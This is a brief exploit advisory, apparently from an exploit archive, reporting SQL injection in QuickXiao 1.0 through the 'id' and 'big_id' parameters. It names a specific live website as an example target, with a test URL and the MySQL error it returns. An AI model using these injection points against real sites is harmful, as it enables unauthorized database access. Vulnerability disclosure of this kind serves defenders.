Quick Sales Network QuickXiao version 1.0 suffers from a remote SQL injection vulnerability.
7aae35ecd24979e182742e482fab8e5a####################################################################################
# Exploit Title : Quick Sales Network QuickXiao 1.0 SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Date : 30/12/2018
# Vendor Homepage : Quickxiao.Com
# Tested On : Windows
# Exploit Risk : Medium
# Category : WebApps
# Version Information : 1.0
# CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL
Command ('SQL Injection') ]
# Cyberizm.Org Exploit Reference Link :
cyberizm.org/cyberizm-technical-support-quick-sales-network-quickxiao-sql-inj.html
####################################################################################
+ China Technical Support Quick Sales Network Quickxiao.Com SQL Injection
Vulnerability
It means in English => Technical Support : Quick Sales Network
####################################################################################
# Exploit : /aboutus.php?id=[SQL Injection]
# Exploit : /news.php?big_id=[SQL Injection]
####################################################################################
# Example Site =>
shaodejixie.com/aboutus.php?id=1%27 => [ Proof of Concept for SQL Inj ] =>
archive.is/k3pVY
# SQL/DB Error :
Error! info: Can not Select to MySQL server!
Script: /aboutus.php
Error : You have an error in your SQL syntax; check the manual that
corresponds to your MySQL
server version for the right syntax to use near '\' and type=0 and
language=0' at line 1
Error : 1064
####################################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
####################################################################################